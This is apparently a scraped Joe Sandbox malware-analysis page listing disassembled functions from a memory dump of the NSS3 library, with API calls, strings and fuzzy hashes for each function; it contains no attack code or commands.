Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: db6f985c37233b2d82f85d7466896de895f5602525f9d6fa14d7ebd6d5746d47
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: A611E6757506006BE7205A69ED41B9BB2E4AF5230EF501538E40AE7B60E632F819CA5E

Function 6C5CFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5CFE08

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5CFE1D

Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5CFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5CFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5CFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C5CFE6F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 36e3dba03d48a900598377e15755981e9b428ab9ec3a3fd74205434640676e67
Instruction ID: 1df63f9daa50a07f8d1f19fda6a67b1f2f77d9c2aea5cf5156ea730cc7ee6419
Opcode Fuzzy Hash: 36e3dba03d48a900598377e15755981e9b428ab9ec3a3fd74205434640676e67
Instruction Fuzzy Hash: A71108B6700305ABEB008FD9DC40A5B73E8AF94399F15823DE91D87B12E731E914C796

Function 6C67FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C67FD9E

Part of subcall function 6C639BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C561A48), ref: 6C639BB3
Part of subcall function 6C639BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C561A48), ref: 6C639BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C67FDB9

Part of subcall function 6C55A900: TlsGetValue.KERNEL32(00000000,?,6C6D14E4,?,6C4F4DD9), ref: 6C55A90F
Part of subcall function 6C55A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C55A94F

PR_Unlock.NSS3 ref: 6C67FDD4
PR_Lock.NSS3 ref: 6C67FDF2
PR_NotifyAllCondVar.NSS3 ref: 6C67FE0D
PR_Unlock.NSS3 ref: 6C67FE23

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 1e14ead1bbbc545450654c46ec36445d0ea32c2e489b3c44628569ddac400b96
Instruction ID: ee80aa3ccf56d1d0348c638c5fb5452b61c49cfec0426913cdd661c17f2e83b9
Opcode Fuzzy Hash: 1e14ead1bbbc545450654c46ec36445d0ea32c2e489b3c44628569ddac400b96
Instruction Fuzzy Hash: 86018EBAA04210ABDF158F56FD00C517671BF4227DB140374E82A47BA1E762ED28CB9A

Function 6C55AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C55AFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6C55AF5C
misuse, xrefs: 6C55AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C55AFC4
%s at line %d of [%.10s], xrefs: 6C55AFD3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 989f27b3a50623fa820433f11de0b2569e3ec28aca56b281ba61f93bc61c293a
Instruction ID: 44f8b68f02b65171fcebd03cd8124b76bf579839d25c9d3fb2c670d49ab2a8e2
Opcode Fuzzy Hash: 989f27b3a50623fa820433f11de0b2569e3ec28aca56b281ba61f93bc61c293a
Instruction Fuzzy Hash: E591E175B002158FDB04CF69CC94ABABBF1BF45314F5984AAE865AB7A1D331EC11CB60

Function 6C5BFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C5BFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5BFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5BFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C5BFDDE

Part of subcall function 6C5C8800: TlsGetValue.KERNEL32(?,6C5D085A,00000000,?,6C578369,?), ref: 6C5C8821
Part of subcall function 6C5C8800: TlsGetValue.KERNEL32(?,?,6C5D085A,00000000,?,6C578369,?), ref: 6C5C883D
Part of subcall function 6C5C8800: EnterCriticalSection.KERNEL32(?,?,?,6C5D085A,00000000,?,6C578369,?), ref: 6C5C8856
Part of subcall function 6C5C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5C8887
Part of subcall function 6C5C8800: PR_Unlock.NSS3(?,?,?,?,6C5D085A,00000000,?,6C578369,?), ref: 6C5C8899

Strings

pkcs11:, xrefs: 6C5BFC4F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 9022e51d39f96feb50a40a468af48c162f01c7bdbab78105d4be62fd8905d124
Instruction ID: bca291e12fc8fd496798e59a9036b0309a4dd27a0ed801ee0b5ab84458b6f371
Opcode Fuzzy Hash: 9022e51d39f96feb50a40a468af48c162f01c7bdbab78105d4be62fd8905d124
Instruction Fuzzy Hash: F251B0BDB04111AFEB008F69DC91BAA3B65AF8135DF150629DD057BB52EB30E904CB92

Function 6C4FBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C4FBE02

Part of subcall function 6C629C40: memcmp.VCRUNTIME140(?,00000000,6C4FC52B), ref: 6C629D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4FBE9F

Strings

database corruption, xrefs: 6C4FBE93
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4FBE89
%s at line %d of [%.10s], xrefs: 6C4FBE98

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: f022834c9fbb82e21f85845167edb81d4581fb80132b6b99516d189d6ce77c04
Instruction ID: d5777a99d6bb1f80a859bbb70450978a4b4348f91a98d5233db1982d202c7459
Opcode Fuzzy Hash: f022834c9fbb82e21f85845167edb81d4581fb80132b6b99516d189d6ce77c04
Instruction Fuzzy Hash: B9310431A446598BC700CF69C894EABBBA2AFC3315B088554EE682BB81D371ED07C7D1

Function 6C5E6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C5E6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E6E57

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C5E6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C5E6EAA

Strings

nhl, xrefs: 6C5E6DF9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nhl
API String ID: 3163584228-1208967380
Opcode ID: ed60e1840cfc0353918bd7e653d849d9e5cced1bb8d14314fb0041fb0718fe2f
Instruction ID: 19fb6c3ea8a221efe86d33a8d1b96fefb8cf7bea9e323ca9f7bf63914155d604
Opcode Fuzzy Hash: ed60e1840cfc0353918bd7e653d849d9e5cced1bb8d14314fb0041fb0718fe2f
Instruction Fuzzy Hash: 9831D17161071AEEDB145F34CC143A7B7A5AB0939AF14063CD699D2AC1EF30B458CF81

Function 6C571EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C574C64,?,-00000004), ref: 6C571EE2

Part of subcall function 6C5D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C571D97,?,?), ref: 6C5D1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C574C64,?,-00000004), ref: 6C571F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C574C64,?,-00000004), ref: 6C571F37
DER_DecodeTimeChoice_Util.NSS3(?,dLWl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C574C64,?,-00000004), ref: 6C571F53

Strings

dLWl, xrefs: 6C571F2B, 6C571F51

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLWl
API String ID: 3216063065-1568550156
Opcode ID: 59af10730d609d1b1260db2a70508b8e6b76069e760e0894e1ad9847ea4232ca
Instruction ID: 8657f46a74d11898affee756e519dd568e89bbb5c75de15b9d9f2754801683f2
Opcode Fuzzy Hash: 59af10730d609d1b1260db2a70508b8e6b76069e760e0894e1ad9847ea4232ca
Instruction Fuzzy Hash: 4F21A7B1504355AFC750CE69DD00A9B77E9AB84659F000929EC48C7A40F330E698C7F2

Function 6C560DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C560BDE), ref: 6C560DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C560BDE), ref: 6C560DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C560BDE), ref: 6C560DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C560BDE), ref: 6C560E32

Strings

%s incr => %d (find lib), xrefs: 6C560E2D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 1b36e65d929b128704438f974f421ee234988607660d2617a96f5737e7c8768e
Instruction ID: bff6fea27184167844005bb779da87a620e4e8bf58a891af10119eead1fb7b57
Opcode Fuzzy Hash: 1b36e65d929b128704438f974f421ee234988607660d2617a96f5737e7c8768e
Instruction Fuzzy Hash: 6E012871B012209FE7208F26DC85E1773BCDF86608B04486EE905D7A51E762FC1487E9

Function 6C5A1CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C5A1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C5A1CF1

Part of subcall function 6C6809D0: PR_Now.NSS3 ref: 6C680A22
Part of subcall function 6C6809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C680A35
Part of subcall function 6C6809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C680A66
Part of subcall function 6C6809D0: PR_GetCurrentThread.NSS3 ref: 6C680A70
Part of subcall function 6C6809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C680A9D
Part of subcall function 6C6809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C680AC8
Part of subcall function 6C6809D0: PR_vsmprintf.NSS3(?,?), ref: 6C680AE8
Part of subcall function 6C6809D0: EnterCriticalSection.KERNEL32(?), ref: 6C680B19
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C680B48
Part of subcall function 6C6809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C680C76
Part of subcall function 6C6809D0: PR_LogFlush.NSS3 ref: 6C680C7E

Strings

pInitArgs = 0x%p, xrefs: 6C5A1CEC
nhl, xrefs: 6C5A1D09, 6C5A1D30
C_Initialize, xrefs: 6C5A1CD3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize$nhl
API String ID: 1907330108-2315921989
Opcode ID: b80aa6d23ae023e6cce8d4976d79905c26e388bb6a1e121b869d17cda9587d0e
Instruction ID: fa8d9c19c24715a0bdd561287dbf9af0b3159bcda49db1d30a8b96e8136222da
Opcode Fuzzy Hash: b80aa6d23ae023e6cce8d4976d79905c26e388bb6a1e121b869d17cda9587d0e
Instruction Fuzzy Hash: F9015239201180EFDF009FA7DD8CB5A77B5EBC6319F144425E50997A11DB34EC4ACB99

Function 6C61AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]`l,00000000,?,?,6C5F6AC6,?), ref: 6C61AC2D

Part of subcall function 6C5BADC0: TlsGetValue.KERNEL32(?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE10
Part of subcall function 6C5BADC0: EnterCriticalSection.KERNEL32(?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE24
Part of subcall function 6C5BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C59D079,00000000,00000001), ref: 6C5BAE5A
Part of subcall function 6C5BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE6F
Part of subcall function 6C5BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE7F
Part of subcall function 6C5BADC0: TlsGetValue.KERNEL32(?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAEB1
Part of subcall function 6C5BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAEC9

PK11_FreeSymKey.NSS3(?,@]`l,00000000,?,?,6C5F6AC6,?), ref: 6C61AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]`l,00000000,?,?,6C5F6AC6,?), ref: 6C61AC59
free.MOZGLUE(8CB6FF01,6C5F6AC6,?,?,?,?,?,?,?,?,?,?,6C605D40,00000000,?,6C60AAD4), ref: 6C61AC62

Strings

@]`l, xrefs: 6C61AC05

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]`l
API String ID: 1595327144-4291656726
Opcode ID: 2f1114f3ee89942d9eee2d076ff7bf60b94c06d23b54ca60dd028aa622b12674
Instruction ID: 8313b7440be315b0c3937df5646063d59572e3012cc64eeda6931a05164ea228
Opcode Fuzzy Hash: 2f1114f3ee89942d9eee2d076ff7bf60b94c06d23b54ca60dd028aa622b12674
Instruction Fuzzy Hash: CD018FB5600200DFDB00CF19ECC0B5677A8EF44719F188068E8498FB06E731EC08CBA5

Function 6C509C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C509CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C509D45
EnterCriticalSection.KERNEL32(?), ref: 6C509D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C509DDE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e85aec57aeace3c518dfb2820ffc88f25ea5a270f4b17db7d0a6bb5602603c13
Instruction ID: b52f74d25cf0583e26dcc96292095b97326e7e4c8bebdea61c5856f4f1b7ae56
Opcode Fuzzy Hash: e85aec57aeace3c518dfb2820ffc88f25ea5a270f4b17db7d0a6bb5602603c13
Instruction Fuzzy Hash: 50A1A171B041008BEB09EF66DDD9B7E3775BB83315F18012DD80687A44DB79E946CB8A

Function 6C591E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C591ECC

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

TlsGetValue.KERNEL32 ref: 6C591EDF
EnterCriticalSection.KERNEL32(?), ref: 6C591EEF
PR_ExitMonitor.NSS3(?), ref: 6C591F37
PR_Unlock.NSS3(?), ref: 6C591F44

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: ccf6398903a44b87c3f6056285e30392310bfd7ae175007de28f674ee8be9743
Instruction ID: 8d90267942e69bd2d09da848384caa94dad87160d3b64066b36310125334387b
Opcode Fuzzy Hash: ccf6398903a44b87c3f6056285e30392310bfd7ae175007de28f674ee8be9743
Instruction Fuzzy Hash: A571AC72A043519FD700CF25DC40A5BBBF5FF88358F144969E89993B21E731E958CB92

Function 6C61DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C61DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C61DE77

Memory Dump Source

